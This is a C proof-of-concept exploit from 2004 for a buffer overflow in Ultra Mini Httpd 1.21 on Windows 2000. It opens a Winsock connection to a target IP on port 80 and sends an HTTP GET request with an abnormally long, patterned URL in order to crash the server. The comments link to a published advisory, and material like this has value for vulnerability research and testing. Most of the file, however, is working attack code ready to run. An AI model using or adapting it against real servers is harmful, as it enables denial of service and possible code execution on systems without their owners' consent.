//************************************************************************** // Ultra Mini Httpd Server Buffer Overflow Vulnerability // Proof-of-concept Exploit for English Win2K SP4 // 29 Jul 2004 // // Ultra Mini Httpd is a HTTP server released by Dip.PicoLix for Windows // platforms. It is small, easy to configure, and supports CGI. Ultra // Mini Httpd version 1.21 has a buffer overflow vulnerability that may // be exploited to crash the server or to execute arbitrary code. // // The vulnerability is triggered by sending a HTTP request with an // abnormally long URL. // // This POC code will crash a vulnerable Ultra Mini Httpd server. // // Advisory // http://www.security.org.sg/vuln/minihttpd121.html // // Greetz: snooq, sk, and all guys at SIG^2 (www.security.org.sg) // //************************************************************************** #include #include #include #pragma comment (lib,"ws2_32.lib") unsigned char expBuf[] = "GET " "AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ" "BAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ" "CAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ" "DAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ" "EAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ" "FAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ" "GAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXX3YYYYZZZZ" "AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ" "BAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ" "CAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ" "DAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ" "EAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ" "FAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ" "GAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXX3YYYYZZZZ" "\r\n\r\n"; int main(int argc, char* argv[]) { WORD wVersionRequested; WSADATA wsaData; struct sockaddr_in sin; int err; if(argc != 2) { printf("Usage: %s \n", argv[0]); return 1; } wVersionRequested = MAKEWORD(2,0); err = WSAStartup(wVersionRequested, &wsaData); if(err != 0) { printf("\nWSAStartup Error.\n"); return 1; } if(LOBYTE(wsaData.wVersion) != 2 || HIBYTE(wsaData.wVersion) != 0) { printf("\nWinsock Version Error\n"); WSACleanup(); return 1; } SOCKET s = WSASocket(AF_INET, SOCK_STREAM, 0, NULL, 0, 0); sin.sin_addr.s_addr = inet_addr(argv[1]); sin.sin_family = AF_INET; sin.sin_port = htons(80); if(connect(s, (sockaddr *)&sin, sizeof(sin)) != SOCKET_ERROR) { if(send(s, (char *)expBuf, strlen((char *)expBuf), 0) == SOCKET_ERROR) { printf("Error sending exploit!\n"); return 1; } printf("Exploit Sent.\n"); Sleep(2000); } else { printf("Cannot connect to server!\n"); } closesocket(s); WSACleanup(); return 0; }